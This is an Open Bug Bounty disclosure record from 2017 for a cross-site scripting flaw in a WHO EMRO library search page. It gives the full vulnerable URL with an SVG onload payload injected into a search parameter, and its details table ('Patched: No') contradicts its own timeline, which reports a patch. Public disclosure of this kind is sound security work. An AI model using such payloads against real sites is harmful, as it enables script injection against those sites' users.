applications.emro.who.int XSS vulnerability

2017-09-01T00:56:00
ID OBB:285753
Type openbugbounty
Reporter eb
Modified 2017-10-03T16:16:00

Description

Vulnerable URL:
http://applications.emro.who.int/library/Databases/wxis.exe/Library/Databases/iah/?IsisScript=iah/iah.xic&base;=imemr&form;=B&user;=guest〈=i&nextAction;=search&indexSearch;=^iSU^xSU%20^yINVERTED^uSU_&exprSearch;=%22Maternal-Child%20Health%20Centers%22%20OR%20%22Maternal-Fetal%20Relations%22%20OR%20%22Mortality%22%20OR%20%22Neonatal%20Nursing%22%20OR%20%22Neonatal%20Screening%22%20OR%20%22Neonatology%22%20OR%20%22Obstetric%20Surgical%20Procedures%22%20OR%20%22Obstetrical%20Nursing%22%20OR%20%22Obstetrics%22%20OR%20%22Perinatal%20Care%22%20OR%20%22Perinatology%22%20OR%20%22Placenta%22%20OR%20%22Placenta%20Diseases%22%20OR%20%22Pregnancy%22%20OR%20%22Pregnancy%20Complications%22%20OR%20%22Pregnancy%20Outcome%22%20OR%20%22Pregnancy,%20High-Risk%22%20OR%20%22Pregnant%20Women%22%20OR%20%22Prenatal%20Exposure%20Delayed%20Effects%22%20OR%20%22Respiratory%20Distress%20Syndrome,%20Newborn%22%20OR%20%22Vaginal%20Birth%20after%20Cesarean%22%20OR%20%22Illegitimacy%22&conectSearch;=AND%20&selected;&indexSearch;=^iPY^xPY%20^yINVERTED^uPY_&exprSearch;=%221985%22%20OR%20%221986%22%20OR%20%221987%22%20OR%20%221988%22%20OR%20%221989%22%20OR%20%221990%22%20OR%20%221991%22%20OR%20%221992%22%20OR%20%221993%22%20OR%20%221994%22%20OR%20%221995%22%20OR%20%221996%22%20OR%20%221997%22%20OR%20%221998%22%20OR%20%221999%22%20OR%20%222000%22%20OR%20%222001%22%20OR%20%222002%22%20OR%20%222003%22%20OR%20%222004%22%20OR%20%222005%22%20OR%20%222006%22%20OR%20%222007%22%20OR%20%222008%22%20OR%20%222009%22%20OR%20%222010%22&conectSearch;=%22%3E%3Csvg/onload=prompt%28/XSSPOSED/%29%3E
Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 03.10.2017
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| Unknown / Not calculated
VIP website status:| No

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 1 September, 2017 00:56 GMT
Generic security notifications sent to website owner| 1 September, 2017 06:23 GMT
Vulnerability patched by the website owner| 3 October, 2017 15:26 GMT
Vulnerability details disclosed by researcher| 3 October, 2017 16:16 GMT